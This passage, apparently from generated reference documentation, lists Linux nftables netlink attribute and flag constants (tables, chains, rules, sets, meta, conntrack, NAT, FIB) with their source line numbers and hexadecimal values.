NFTA_LIST_UNSPEC (line 2044) | NFTA_LIST_UNSPEC = 0x0 constant NFTA_LIST_ELEM (line 2045) | NFTA_LIST_ELEM = 0x1 constant NFTA_HOOK_UNSPEC (line 2046) | NFTA_HOOK_UNSPEC = 0x0 constant NFTA_HOOK_HOOKNUM (line 2047) | NFTA_HOOK_HOOKNUM = 0x1 constant NFTA_HOOK_PRIORITY (line 2048) | NFTA_HOOK_PRIORITY = 0x2 constant NFTA_HOOK_DEV (line 2049) | NFTA_HOOK_DEV = 0x3 constant NFT_TABLE_F_DORMANT (line 2050) | NFT_TABLE_F_DORMANT = 0x1 constant NFTA_TABLE_UNSPEC (line 2051) | NFTA_TABLE_UNSPEC = 0x0 constant NFTA_TABLE_NAME (line 2052) | NFTA_TABLE_NAME = 0x1 constant NFTA_TABLE_FLAGS (line 2053) | NFTA_TABLE_FLAGS = 0x2 constant NFTA_TABLE_USE (line 2054) | NFTA_TABLE_USE = 0x3 constant NFTA_CHAIN_UNSPEC (line 2055) | NFTA_CHAIN_UNSPEC = 0x0 constant NFTA_CHAIN_TABLE (line 2056) | NFTA_CHAIN_TABLE = 0x1 constant NFTA_CHAIN_HANDLE (line 2057) | NFTA_CHAIN_HANDLE = 0x2 constant NFTA_CHAIN_NAME (line 2058) | NFTA_CHAIN_NAME = 0x3 constant NFTA_CHAIN_HOOK (line 2059) | NFTA_CHAIN_HOOK = 0x4 constant NFTA_CHAIN_POLICY (line 2060) | NFTA_CHAIN_POLICY = 0x5 constant NFTA_CHAIN_USE (line 2061) | NFTA_CHAIN_USE = 0x6 constant NFTA_CHAIN_TYPE (line 2062) | NFTA_CHAIN_TYPE = 0x7 constant NFTA_CHAIN_COUNTERS (line 2063) | NFTA_CHAIN_COUNTERS = 0x8 constant NFTA_CHAIN_PAD (line 2064) | NFTA_CHAIN_PAD = 0x9 constant NFTA_RULE_UNSPEC (line 2065) | NFTA_RULE_UNSPEC = 0x0 constant NFTA_RULE_TABLE (line 2066) | NFTA_RULE_TABLE = 0x1 constant NFTA_RULE_CHAIN (line 2067) | NFTA_RULE_CHAIN = 0x2 constant NFTA_RULE_HANDLE (line 2068) | NFTA_RULE_HANDLE = 0x3 constant NFTA_RULE_EXPRESSIONS (line 2069) | NFTA_RULE_EXPRESSIONS = 0x4 constant NFTA_RULE_COMPAT (line 2070) | NFTA_RULE_COMPAT = 0x5 constant NFTA_RULE_POSITION (line 2071) | NFTA_RULE_POSITION = 0x6 constant NFTA_RULE_USERDATA (line 2072) | NFTA_RULE_USERDATA = 0x7 constant NFTA_RULE_PAD (line 2073) | NFTA_RULE_PAD = 0x8 constant NFTA_RULE_ID (line 2074) | NFTA_RULE_ID = 0x9 constant NFT_RULE_COMPAT_F_INV (line 2075) | NFT_RULE_COMPAT_F_INV = 0x2 constant NFT_RULE_COMPAT_F_MASK (line 2076) | NFT_RULE_COMPAT_F_MASK = 0x2 constant NFTA_RULE_COMPAT_UNSPEC (line 2077) | NFTA_RULE_COMPAT_UNSPEC = 0x0 constant NFTA_RULE_COMPAT_PROTO (line 2078) | NFTA_RULE_COMPAT_PROTO = 0x1 constant NFTA_RULE_COMPAT_FLAGS (line 2079) | NFTA_RULE_COMPAT_FLAGS = 0x2 constant NFT_SET_ANONYMOUS (line 2080) | NFT_SET_ANONYMOUS = 0x1 constant NFT_SET_CONSTANT (line 2081) | NFT_SET_CONSTANT = 0x2 constant NFT_SET_INTERVAL (line 2082) | NFT_SET_INTERVAL = 0x4 constant NFT_SET_MAP (line 2083) | NFT_SET_MAP = 0x8 constant NFT_SET_TIMEOUT (line 2084) | NFT_SET_TIMEOUT = 0x10 constant NFT_SET_EVAL (line 2085) | NFT_SET_EVAL = 0x20 constant NFT_SET_OBJECT (line 2086) | NFT_SET_OBJECT = 0x40 constant NFT_SET_POL_PERFORMANCE (line 2087) | NFT_SET_POL_PERFORMANCE = 0x0 constant NFT_SET_POL_MEMORY (line 2088) | NFT_SET_POL_MEMORY = 0x1 constant NFTA_SET_DESC_UNSPEC (line 2089) | NFTA_SET_DESC_UNSPEC = 0x0 constant NFTA_SET_DESC_SIZE (line 2090) | NFTA_SET_DESC_SIZE = 0x1 constant NFTA_SET_UNSPEC (line 2091) | NFTA_SET_UNSPEC = 0x0 constant NFTA_SET_TABLE (line 2092) | NFTA_SET_TABLE = 0x1 constant NFTA_SET_NAME (line 2093) | NFTA_SET_NAME = 0x2 constant NFTA_SET_FLAGS (line 2094) | NFTA_SET_FLAGS = 0x3 constant NFTA_SET_KEY_TYPE (line 2095) | NFTA_SET_KEY_TYPE = 0x4 constant NFTA_SET_KEY_LEN (line 2096) | NFTA_SET_KEY_LEN = 0x5 constant NFTA_SET_DATA_TYPE (line 2097) | NFTA_SET_DATA_TYPE = 0x6 constant NFTA_SET_DATA_LEN (line 2098) | NFTA_SET_DATA_LEN = 0x7 constant NFTA_SET_POLICY (line 2099) | NFTA_SET_POLICY = 0x8 constant NFTA_SET_DESC (line 2100) | NFTA_SET_DESC = 0x9 constant NFTA_SET_ID (line 2101) | NFTA_SET_ID = 0xa constant NFTA_SET_TIMEOUT (line 2102) | NFTA_SET_TIMEOUT = 0xb constant NFTA_SET_GC_INTERVAL (line 2103) | NFTA_SET_GC_INTERVAL = 0xc constant NFTA_SET_USERDATA (line 2104) | NFTA_SET_USERDATA = 0xd constant NFTA_SET_PAD (line 2105) | NFTA_SET_PAD = 0xe constant NFTA_SET_OBJ_TYPE (line 2106) | NFTA_SET_OBJ_TYPE = 0xf constant NFT_SET_ELEM_INTERVAL_END (line 2107) | NFT_SET_ELEM_INTERVAL_END = 0x1 constant NFTA_SET_ELEM_UNSPEC (line 2108) | NFTA_SET_ELEM_UNSPEC = 0x0 constant NFTA_SET_ELEM_KEY (line 2109) | NFTA_SET_ELEM_KEY = 0x1 constant NFTA_SET_ELEM_DATA (line 2110) | NFTA_SET_ELEM_DATA = 0x2 constant NFTA_SET_ELEM_FLAGS (line 2111) | NFTA_SET_ELEM_FLAGS = 0x3 constant NFTA_SET_ELEM_TIMEOUT (line 2112) | NFTA_SET_ELEM_TIMEOUT = 0x4 constant NFTA_SET_ELEM_EXPIRATION (line 2113) | NFTA_SET_ELEM_EXPIRATION = 0x5 constant NFTA_SET_ELEM_USERDATA (line 2114) | NFTA_SET_ELEM_USERDATA = 0x6 constant NFTA_SET_ELEM_EXPR (line 2115) | NFTA_SET_ELEM_EXPR = 0x7 constant NFTA_SET_ELEM_PAD (line 2116) | NFTA_SET_ELEM_PAD = 0x8 constant NFTA_SET_ELEM_OBJREF (line 2117) | NFTA_SET_ELEM_OBJREF = 0x9 constant NFTA_SET_ELEM_LIST_UNSPEC (line 2118) | NFTA_SET_ELEM_LIST_UNSPEC = 0x0 constant NFTA_SET_ELEM_LIST_TABLE (line 2119) | NFTA_SET_ELEM_LIST_TABLE = 0x1 constant NFTA_SET_ELEM_LIST_SET (line 2120) | NFTA_SET_ELEM_LIST_SET = 0x2 constant NFTA_SET_ELEM_LIST_ELEMENTS (line 2121) | NFTA_SET_ELEM_LIST_ELEMENTS = 0x3 constant NFTA_SET_ELEM_LIST_SET_ID (line 2122) | NFTA_SET_ELEM_LIST_SET_ID = 0x4 constant NFT_DATA_VALUE (line 2123) | NFT_DATA_VALUE = 0x0 constant NFT_DATA_VERDICT (line 2124) | NFT_DATA_VERDICT = 0xffffff00 constant NFTA_DATA_UNSPEC (line 2125) | NFTA_DATA_UNSPEC = 0x0 constant NFTA_DATA_VALUE (line 2126) | NFTA_DATA_VALUE = 0x1 constant NFTA_DATA_VERDICT (line 2127) | NFTA_DATA_VERDICT = 0x2 constant NFTA_VERDICT_UNSPEC (line 2128) | NFTA_VERDICT_UNSPEC = 0x0 constant NFTA_VERDICT_CODE (line 2129) | NFTA_VERDICT_CODE = 0x1 constant NFTA_VERDICT_CHAIN (line 2130) | NFTA_VERDICT_CHAIN = 0x2 constant NFTA_EXPR_UNSPEC (line 2131) | NFTA_EXPR_UNSPEC = 0x0 constant NFTA_EXPR_NAME (line 2132) | NFTA_EXPR_NAME = 0x1 constant NFTA_EXPR_DATA (line 2133) | NFTA_EXPR_DATA = 0x2 constant NFTA_IMMEDIATE_UNSPEC (line 2134) | NFTA_IMMEDIATE_UNSPEC = 0x0 constant NFTA_IMMEDIATE_DREG (line 2135) | NFTA_IMMEDIATE_DREG = 0x1 constant NFTA_IMMEDIATE_DATA (line 2136) | NFTA_IMMEDIATE_DATA = 0x2 constant NFTA_BITWISE_UNSPEC (line 2137) | NFTA_BITWISE_UNSPEC = 0x0 constant NFTA_BITWISE_SREG (line 2138) | NFTA_BITWISE_SREG = 0x1 constant NFTA_BITWISE_DREG (line 2139) | NFTA_BITWISE_DREG = 0x2 constant NFTA_BITWISE_LEN (line 2140) | NFTA_BITWISE_LEN = 0x3 constant NFTA_BITWISE_MASK (line 2141) | NFTA_BITWISE_MASK = 0x4 constant NFTA_BITWISE_XOR (line 2142) | NFTA_BITWISE_XOR = 0x5 constant NFT_BYTEORDER_NTOH (line 2143) | NFT_BYTEORDER_NTOH = 0x0 constant NFT_BYTEORDER_HTON (line 2144) | NFT_BYTEORDER_HTON = 0x1 constant NFTA_BYTEORDER_UNSPEC (line 2145) | NFTA_BYTEORDER_UNSPEC = 0x0 constant NFTA_BYTEORDER_SREG (line 2146) | NFTA_BYTEORDER_SREG = 0x1 constant NFTA_BYTEORDER_DREG (line 2147) | NFTA_BYTEORDER_DREG = 0x2 constant NFTA_BYTEORDER_OP (line 2148) | NFTA_BYTEORDER_OP = 0x3 constant NFTA_BYTEORDER_LEN (line 2149) | NFTA_BYTEORDER_LEN = 0x4 constant NFTA_BYTEORDER_SIZE (line 2150) | NFTA_BYTEORDER_SIZE = 0x5 constant NFT_CMP_EQ (line 2151) | NFT_CMP_EQ = 0x0 constant NFT_CMP_NEQ (line 2152) | NFT_CMP_NEQ = 0x1 constant NFT_CMP_LT (line 2153) | NFT_CMP_LT = 0x2 constant NFT_CMP_LTE (line 2154) | NFT_CMP_LTE = 0x3 constant NFT_CMP_GT (line 2155) | NFT_CMP_GT = 0x4 constant NFT_CMP_GTE (line 2156) | NFT_CMP_GTE = 0x5 constant NFTA_CMP_UNSPEC (line 2157) | NFTA_CMP_UNSPEC = 0x0 constant NFTA_CMP_SREG (line 2158) | NFTA_CMP_SREG = 0x1 constant NFTA_CMP_OP (line 2159) | NFTA_CMP_OP = 0x2 constant NFTA_CMP_DATA (line 2160) | NFTA_CMP_DATA = 0x3 constant NFT_RANGE_EQ (line 2161) | NFT_RANGE_EQ = 0x0 constant NFT_RANGE_NEQ (line 2162) | NFT_RANGE_NEQ = 0x1 constant NFTA_RANGE_UNSPEC (line 2163) | NFTA_RANGE_UNSPEC = 0x0 constant NFTA_RANGE_SREG (line 2164) | NFTA_RANGE_SREG = 0x1 constant NFTA_RANGE_OP (line 2165) | NFTA_RANGE_OP = 0x2 constant NFTA_RANGE_FROM_DATA (line 2166) | NFTA_RANGE_FROM_DATA = 0x3 constant NFTA_RANGE_TO_DATA (line 2167) | NFTA_RANGE_TO_DATA = 0x4 constant NFT_LOOKUP_F_INV (line 2168) | NFT_LOOKUP_F_INV = 0x1 constant NFTA_LOOKUP_UNSPEC (line 2169) | NFTA_LOOKUP_UNSPEC = 0x0 constant NFTA_LOOKUP_SET (line 2170) | NFTA_LOOKUP_SET = 0x1 constant NFTA_LOOKUP_SREG (line 2171) | NFTA_LOOKUP_SREG = 0x2 constant NFTA_LOOKUP_DREG (line 2172) | NFTA_LOOKUP_DREG = 0x3 constant NFTA_LOOKUP_SET_ID (line 2173) | NFTA_LOOKUP_SET_ID = 0x4 constant NFTA_LOOKUP_FLAGS (line 2174) | NFTA_LOOKUP_FLAGS = 0x5 constant NFT_DYNSET_OP_ADD (line 2175) | NFT_DYNSET_OP_ADD = 0x0 constant NFT_DYNSET_OP_UPDATE (line 2176) | NFT_DYNSET_OP_UPDATE = 0x1 constant NFT_DYNSET_F_INV (line 2177) | NFT_DYNSET_F_INV = 0x1 constant NFTA_DYNSET_UNSPEC (line 2178) | NFTA_DYNSET_UNSPEC = 0x0 constant NFTA_DYNSET_SET_NAME (line 2179) | NFTA_DYNSET_SET_NAME = 0x1 constant NFTA_DYNSET_SET_ID (line 2180) | NFTA_DYNSET_SET_ID = 0x2 constant NFTA_DYNSET_OP (line 2181) | NFTA_DYNSET_OP = 0x3 constant NFTA_DYNSET_SREG_KEY (line 2182) | NFTA_DYNSET_SREG_KEY = 0x4 constant NFTA_DYNSET_SREG_DATA (line 2183) | NFTA_DYNSET_SREG_DATA = 0x5 constant NFTA_DYNSET_TIMEOUT (line 2184) | NFTA_DYNSET_TIMEOUT = 0x6 constant NFTA_DYNSET_EXPR (line 2185) | NFTA_DYNSET_EXPR = 0x7 constant NFTA_DYNSET_PAD (line 2186) | NFTA_DYNSET_PAD = 0x8 constant NFTA_DYNSET_FLAGS (line 2187) | NFTA_DYNSET_FLAGS = 0x9 constant NFT_PAYLOAD_LL_HEADER (line 2188) | NFT_PAYLOAD_LL_HEADER = 0x0 constant NFT_PAYLOAD_NETWORK_HEADER (line 2189) | NFT_PAYLOAD_NETWORK_HEADER = 0x1 constant NFT_PAYLOAD_TRANSPORT_HEADER (line 2190) | NFT_PAYLOAD_TRANSPORT_HEADER = 0x2 constant NFT_PAYLOAD_CSUM_NONE (line 2191) | NFT_PAYLOAD_CSUM_NONE = 0x0 constant NFT_PAYLOAD_CSUM_INET (line 2192) | NFT_PAYLOAD_CSUM_INET = 0x1 constant NFT_PAYLOAD_L4CSUM_PSEUDOHDR (line 2193) | NFT_PAYLOAD_L4CSUM_PSEUDOHDR = 0x1 constant NFTA_PAYLOAD_UNSPEC (line 2194) | NFTA_PAYLOAD_UNSPEC = 0x0 constant NFTA_PAYLOAD_DREG (line 2195) | NFTA_PAYLOAD_DREG = 0x1 constant NFTA_PAYLOAD_BASE (line 2196) | NFTA_PAYLOAD_BASE = 0x2 constant NFTA_PAYLOAD_OFFSET (line 2197) | NFTA_PAYLOAD_OFFSET = 0x3 constant NFTA_PAYLOAD_LEN (line 2198) | NFTA_PAYLOAD_LEN = 0x4 constant NFTA_PAYLOAD_SREG (line 2199) | NFTA_PAYLOAD_SREG = 0x5 constant NFTA_PAYLOAD_CSUM_TYPE (line 2200) | NFTA_PAYLOAD_CSUM_TYPE = 0x6 constant NFTA_PAYLOAD_CSUM_OFFSET (line 2201) | NFTA_PAYLOAD_CSUM_OFFSET = 0x7 constant NFTA_PAYLOAD_CSUM_FLAGS (line 2202) | NFTA_PAYLOAD_CSUM_FLAGS = 0x8 constant NFT_EXTHDR_F_PRESENT (line 2203) | NFT_EXTHDR_F_PRESENT = 0x1 constant NFT_EXTHDR_OP_IPV6 (line 2204) | NFT_EXTHDR_OP_IPV6 = 0x0 constant NFT_EXTHDR_OP_TCPOPT (line 2205) | NFT_EXTHDR_OP_TCPOPT = 0x1 constant NFTA_EXTHDR_UNSPEC (line 2206) | NFTA_EXTHDR_UNSPEC = 0x0 constant NFTA_EXTHDR_DREG (line 2207) | NFTA_EXTHDR_DREG = 0x1 constant NFTA_EXTHDR_TYPE (line 2208) | NFTA_EXTHDR_TYPE = 0x2 constant NFTA_EXTHDR_OFFSET (line 2209) | NFTA_EXTHDR_OFFSET = 0x3 constant NFTA_EXTHDR_LEN (line 2210) | NFTA_EXTHDR_LEN = 0x4 constant NFTA_EXTHDR_FLAGS (line 2211) | NFTA_EXTHDR_FLAGS = 0x5 constant NFTA_EXTHDR_OP (line 2212) | NFTA_EXTHDR_OP = 0x6 constant NFTA_EXTHDR_SREG (line 2213) | NFTA_EXTHDR_SREG = 0x7 constant NFT_META_LEN (line 2214) | NFT_META_LEN = 0x0 constant NFT_META_PROTOCOL (line 2215) | NFT_META_PROTOCOL = 0x1 constant NFT_META_PRIORITY (line 2216) | NFT_META_PRIORITY = 0x2 constant NFT_META_MARK (line 2217) | NFT_META_MARK = 0x3 constant NFT_META_IIF (line 2218) | NFT_META_IIF = 0x4 constant NFT_META_OIF (line 2219) | NFT_META_OIF = 0x5 constant NFT_META_IIFNAME (line 2220) | NFT_META_IIFNAME = 0x6 constant NFT_META_OIFNAME (line 2221) | NFT_META_OIFNAME = 0x7 constant NFT_META_IIFTYPE (line 2222) | NFT_META_IIFTYPE = 0x8 constant NFT_META_OIFTYPE (line 2223) | NFT_META_OIFTYPE = 0x9 constant NFT_META_SKUID (line 2224) | NFT_META_SKUID = 0xa constant NFT_META_SKGID (line 2225) | NFT_META_SKGID = 0xb constant NFT_META_NFTRACE (line 2226) | NFT_META_NFTRACE = 0xc constant NFT_META_RTCLASSID (line 2227) | NFT_META_RTCLASSID = 0xd constant NFT_META_SECMARK (line 2228) | NFT_META_SECMARK = 0xe constant NFT_META_NFPROTO (line 2229) | NFT_META_NFPROTO = 0xf constant NFT_META_L4PROTO (line 2230) | NFT_META_L4PROTO = 0x10 constant NFT_META_BRI_IIFNAME (line 2231) | NFT_META_BRI_IIFNAME = 0x11 constant NFT_META_BRI_OIFNAME (line 2232) | NFT_META_BRI_OIFNAME = 0x12 constant NFT_META_PKTTYPE (line 2233) | NFT_META_PKTTYPE = 0x13 constant NFT_META_CPU (line 2234) | NFT_META_CPU = 0x14 constant NFT_META_IIFGROUP (line 2235) | NFT_META_IIFGROUP = 0x15 constant NFT_META_OIFGROUP (line 2236) | NFT_META_OIFGROUP = 0x16 constant NFT_META_CGROUP (line 2237) | NFT_META_CGROUP = 0x17 constant NFT_META_PRANDOM (line 2238) | NFT_META_PRANDOM = 0x18 constant NFT_RT_CLASSID (line 2239) | NFT_RT_CLASSID = 0x0 constant NFT_RT_NEXTHOP4 (line 2240) | NFT_RT_NEXTHOP4 = 0x1 constant NFT_RT_NEXTHOP6 (line 2241) | NFT_RT_NEXTHOP6 = 0x2 constant NFT_RT_TCPMSS (line 2242) | NFT_RT_TCPMSS = 0x3 constant NFT_HASH_JENKINS (line 2243) | NFT_HASH_JENKINS = 0x0 constant NFT_HASH_SYM (line 2244) | NFT_HASH_SYM = 0x1 constant NFTA_HASH_UNSPEC (line 2245) | NFTA_HASH_UNSPEC = 0x0 constant NFTA_HASH_SREG (line 2246) | NFTA_HASH_SREG = 0x1 constant NFTA_HASH_DREG (line 2247) | NFTA_HASH_DREG = 0x2 constant NFTA_HASH_LEN (line 2248) | NFTA_HASH_LEN = 0x3 constant NFTA_HASH_MODULUS (line 2249) | NFTA_HASH_MODULUS = 0x4 constant NFTA_HASH_SEED (line 2250) | NFTA_HASH_SEED = 0x5 constant NFTA_HASH_OFFSET (line 2251) | NFTA_HASH_OFFSET = 0x6 constant NFTA_HASH_TYPE (line 2252) | NFTA_HASH_TYPE = 0x7 constant NFTA_META_UNSPEC (line 2253) | NFTA_META_UNSPEC = 0x0 constant NFTA_META_DREG (line 2254) | NFTA_META_DREG = 0x1 constant NFTA_META_KEY (line 2255) | NFTA_META_KEY = 0x2 constant NFTA_META_SREG (line 2256) | NFTA_META_SREG = 0x3 constant NFTA_RT_UNSPEC (line 2257) | NFTA_RT_UNSPEC = 0x0 constant NFTA_RT_DREG (line 2258) | NFTA_RT_DREG = 0x1 constant NFTA_RT_KEY (line 2259) | NFTA_RT_KEY = 0x2 constant NFT_CT_STATE (line 2260) | NFT_CT_STATE = 0x0 constant NFT_CT_DIRECTION (line 2261) | NFT_CT_DIRECTION = 0x1 constant NFT_CT_STATUS (line 2262) | NFT_CT_STATUS = 0x2 constant NFT_CT_MARK (line 2263) | NFT_CT_MARK = 0x3 constant NFT_CT_SECMARK (line 2264) | NFT_CT_SECMARK = 0x4 constant NFT_CT_EXPIRATION (line 2265) | NFT_CT_EXPIRATION = 0x5 constant NFT_CT_HELPER (line 2266) | NFT_CT_HELPER = 0x6 constant NFT_CT_L3PROTOCOL (line 2267) | NFT_CT_L3PROTOCOL = 0x7 constant NFT_CT_SRC (line 2268) | NFT_CT_SRC = 0x8 constant NFT_CT_DST (line 2269) | NFT_CT_DST = 0x9 constant NFT_CT_PROTOCOL (line 2270) | NFT_CT_PROTOCOL = 0xa constant NFT_CT_PROTO_SRC (line 2271) | NFT_CT_PROTO_SRC = 0xb constant NFT_CT_PROTO_DST (line 2272) | NFT_CT_PROTO_DST = 0xc constant NFT_CT_LABELS (line 2273) | NFT_CT_LABELS = 0xd constant NFT_CT_PKTS (line 2274) | NFT_CT_PKTS = 0xe constant NFT_CT_BYTES (line 2275) | NFT_CT_BYTES = 0xf constant NFT_CT_AVGPKT (line 2276) | NFT_CT_AVGPKT = 0x10 constant NFT_CT_ZONE (line 2277) | NFT_CT_ZONE = 0x11 constant NFT_CT_EVENTMASK (line 2278) | NFT_CT_EVENTMASK = 0x12 constant NFTA_CT_UNSPEC (line 2279) | NFTA_CT_UNSPEC = 0x0 constant NFTA_CT_DREG (line 2280) | NFTA_CT_DREG = 0x1 constant NFTA_CT_KEY (line 2281) | NFTA_CT_KEY = 0x2 constant NFTA_CT_DIRECTION (line 2282) | NFTA_CT_DIRECTION = 0x3 constant NFTA_CT_SREG (line 2283) | NFTA_CT_SREG = 0x4 constant NFT_LIMIT_PKTS (line 2284) | NFT_LIMIT_PKTS = 0x0 constant NFT_LIMIT_PKT_BYTES (line 2285) | NFT_LIMIT_PKT_BYTES = 0x1 constant NFT_LIMIT_F_INV (line 2286) | NFT_LIMIT_F_INV = 0x1 constant NFTA_LIMIT_UNSPEC (line 2287) | NFTA_LIMIT_UNSPEC = 0x0 constant NFTA_LIMIT_RATE (line 2288) | NFTA_LIMIT_RATE = 0x1 constant NFTA_LIMIT_UNIT (line 2289) | NFTA_LIMIT_UNIT = 0x2 constant NFTA_LIMIT_BURST (line 2290) | NFTA_LIMIT_BURST = 0x3 constant NFTA_LIMIT_TYPE (line 2291) | NFTA_LIMIT_TYPE = 0x4 constant NFTA_LIMIT_FLAGS (line 2292) | NFTA_LIMIT_FLAGS = 0x5 constant NFTA_LIMIT_PAD (line 2293) | NFTA_LIMIT_PAD = 0x6 constant NFTA_COUNTER_UNSPEC (line 2294) | NFTA_COUNTER_UNSPEC = 0x0 constant NFTA_COUNTER_BYTES (line 2295) | NFTA_COUNTER_BYTES = 0x1 constant NFTA_COUNTER_PACKETS (line 2296) | NFTA_COUNTER_PACKETS = 0x2 constant NFTA_COUNTER_PAD (line 2297) | NFTA_COUNTER_PAD = 0x3 constant NFTA_LOG_UNSPEC (line 2298) | NFTA_LOG_UNSPEC = 0x0 constant NFTA_LOG_GROUP (line 2299) | NFTA_LOG_GROUP = 0x1 constant NFTA_LOG_PREFIX (line 2300) | NFTA_LOG_PREFIX = 0x2 constant NFTA_LOG_SNAPLEN (line 2301) | NFTA_LOG_SNAPLEN = 0x3 constant NFTA_LOG_QTHRESHOLD (line 2302) | NFTA_LOG_QTHRESHOLD = 0x4 constant NFTA_LOG_LEVEL (line 2303) | NFTA_LOG_LEVEL = 0x5 constant NFTA_LOG_FLAGS (line 2304) | NFTA_LOG_FLAGS = 0x6 constant NFTA_QUEUE_UNSPEC (line 2305) | NFTA_QUEUE_UNSPEC = 0x0 constant NFTA_QUEUE_NUM (line 2306) | NFTA_QUEUE_NUM = 0x1 constant NFTA_QUEUE_TOTAL (line 2307) | NFTA_QUEUE_TOTAL = 0x2 constant NFTA_QUEUE_FLAGS (line 2308) | NFTA_QUEUE_FLAGS = 0x3 constant NFTA_QUEUE_SREG_QNUM (line 2309) | NFTA_QUEUE_SREG_QNUM = 0x4 constant NFT_QUOTA_F_INV (line 2310) | NFT_QUOTA_F_INV = 0x1 constant NFT_QUOTA_F_DEPLETED (line 2311) | NFT_QUOTA_F_DEPLETED = 0x2 constant NFTA_QUOTA_UNSPEC (line 2312) | NFTA_QUOTA_UNSPEC = 0x0 constant NFTA_QUOTA_BYTES (line 2313) | NFTA_QUOTA_BYTES = 0x1 constant NFTA_QUOTA_FLAGS (line 2314) | NFTA_QUOTA_FLAGS = 0x2 constant NFTA_QUOTA_PAD (line 2315) | NFTA_QUOTA_PAD = 0x3 constant NFTA_QUOTA_CONSUMED (line 2316) | NFTA_QUOTA_CONSUMED = 0x4 constant NFT_REJECT_ICMP_UNREACH (line 2317) | NFT_REJECT_ICMP_UNREACH = 0x0 constant NFT_REJECT_TCP_RST (line 2318) | NFT_REJECT_TCP_RST = 0x1 constant NFT_REJECT_ICMPX_UNREACH (line 2319) | NFT_REJECT_ICMPX_UNREACH = 0x2 constant NFT_REJECT_ICMPX_NO_ROUTE (line 2320) | NFT_REJECT_ICMPX_NO_ROUTE = 0x0 constant NFT_REJECT_ICMPX_PORT_UNREACH (line 2321) | NFT_REJECT_ICMPX_PORT_UNREACH = 0x1 constant NFT_REJECT_ICMPX_HOST_UNREACH (line 2322) | NFT_REJECT_ICMPX_HOST_UNREACH = 0x2 constant NFT_REJECT_ICMPX_ADMIN_PROHIBITED (line 2323) | NFT_REJECT_ICMPX_ADMIN_PROHIBITED = 0x3 constant NFTA_REJECT_UNSPEC (line 2324) | NFTA_REJECT_UNSPEC = 0x0 constant NFTA_REJECT_TYPE (line 2325) | NFTA_REJECT_TYPE = 0x1 constant NFTA_REJECT_ICMP_CODE (line 2326) | NFTA_REJECT_ICMP_CODE = 0x2 constant NFT_NAT_SNAT (line 2327) | NFT_NAT_SNAT = 0x0 constant NFT_NAT_DNAT (line 2328) | NFT_NAT_DNAT = 0x1 constant NFTA_NAT_UNSPEC (line 2329) | NFTA_NAT_UNSPEC = 0x0 constant NFTA_NAT_TYPE (line 2330) | NFTA_NAT_TYPE = 0x1 constant NFTA_NAT_FAMILY (line 2331) | NFTA_NAT_FAMILY = 0x2 constant NFTA_NAT_REG_ADDR_MIN (line 2332) | NFTA_NAT_REG_ADDR_MIN = 0x3 constant NFTA_NAT_REG_ADDR_MAX (line 2333) | NFTA_NAT_REG_ADDR_MAX = 0x4 constant NFTA_NAT_REG_PROTO_MIN (line 2334) | NFTA_NAT_REG_PROTO_MIN = 0x5 constant NFTA_NAT_REG_PROTO_MAX (line 2335) | NFTA_NAT_REG_PROTO_MAX = 0x6 constant NFTA_NAT_FLAGS (line 2336) | NFTA_NAT_FLAGS = 0x7 constant NFTA_MASQ_UNSPEC (line 2337) | NFTA_MASQ_UNSPEC = 0x0 constant NFTA_MASQ_FLAGS (line 2338) | NFTA_MASQ_FLAGS = 0x1 constant NFTA_MASQ_REG_PROTO_MIN (line 2339) | NFTA_MASQ_REG_PROTO_MIN = 0x2 constant NFTA_MASQ_REG_PROTO_MAX (line 2340) | NFTA_MASQ_REG_PROTO_MAX = 0x3 constant NFTA_REDIR_UNSPEC (line 2341) | NFTA_REDIR_UNSPEC = 0x0 constant NFTA_REDIR_REG_PROTO_MIN (line 2342) | NFTA_REDIR_REG_PROTO_MIN = 0x1 constant NFTA_REDIR_REG_PROTO_MAX (line 2343) | NFTA_REDIR_REG_PROTO_MAX = 0x2 constant NFTA_REDIR_FLAGS (line 2344) | NFTA_REDIR_FLAGS = 0x3 constant NFTA_DUP_UNSPEC (line 2345) | NFTA_DUP_UNSPEC = 0x0 constant NFTA_DUP_SREG_ADDR (line 2346) | NFTA_DUP_SREG_ADDR = 0x1 constant NFTA_DUP_SREG_DEV (line 2347) | NFTA_DUP_SREG_DEV = 0x2 constant NFTA_FWD_UNSPEC (line 2348) | NFTA_FWD_UNSPEC = 0x0 constant NFTA_FWD_SREG_DEV (line 2349) | NFTA_FWD_SREG_DEV = 0x1 constant NFTA_OBJREF_UNSPEC (line 2350) | NFTA_OBJREF_UNSPEC = 0x0 constant NFTA_OBJREF_IMM_TYPE (line 2351) | NFTA_OBJREF_IMM_TYPE = 0x1 constant NFTA_OBJREF_IMM_NAME (line 2352) | NFTA_OBJREF_IMM_NAME = 0x2 constant NFTA_OBJREF_SET_SREG (line 2353) | NFTA_OBJREF_SET_SREG = 0x3 constant NFTA_OBJREF_SET_NAME (line 2354) | NFTA_OBJREF_SET_NAME = 0x4 constant NFTA_OBJREF_SET_ID (line 2355) | NFTA_OBJREF_SET_ID = 0x5 constant NFTA_GEN_UNSPEC (line 2356) | NFTA_GEN_UNSPEC = 0x0 constant NFTA_GEN_ID (line 2357) | NFTA_GEN_ID = 0x1 constant NFTA_GEN_PROC_PID (line 2358) | NFTA_GEN_PROC_PID = 0x2 constant NFTA_GEN_PROC_NAME (line 2359) | NFTA_GEN_PROC_NAME = 0x3 constant NFTA_FIB_UNSPEC (line 2360) | NFTA_FIB_UNSPEC = 0x0 constant NFTA_FIB_DREG (line 2361) | NFTA_FIB_DREG = 0x1 constant NFTA_FIB_RESULT (line 2362) | NFTA_FIB_RESULT = 0x2 constant NFTA_FIB_FLAGS (line 2363) | NFTA_FIB_FLAGS = 0x3 constant NFT_FIB_RESULT_UNSPEC (line 2364) | NFT_FIB_RESULT_UNSPEC = 0x0 constant NFT_FIB_RESULT_OIF (line 2365) | NFT_FIB_RESULT_OIF = 0x1 constant NFT_FIB_RESULT_OIFNAME (line 2366) | NFT_FIB_RESULT_OIFNAME = 0x2 constant NFT_FIB_RESULT_ADDRTYPE (line 2367) | NFT_FIB_RESULT_ADDRTYPE = 0x3 constant NFTA_FIB_F_SADDR (line 2368) | NFTA_FIB_F_SADDR = 0x1 constant NFTA_FIB_F_DADDR (line 2369) | NFTA_FIB_F_DADDR = 0x2 constant NFTA_FIB_F_MARK (line 2370) | NFTA_FIB_F_MARK = 0x4 constant NFTA_FIB_F_IIF (line 2371) | NFTA_FIB_F_IIF = 0x8 constant NFTA_FIB_F_OIF (line 2372) | NFTA_FIB_F_OIF = 0x10 constant NFTA_FIB_F_PRESENT (line 2373) | NFTA_FIB_F_PRESENT = 0x20 constant NFTA_CT_HELPER_UNSPEC (line 2374) | NFTA_CT_HELPER_UNSPEC = 0x0 constant 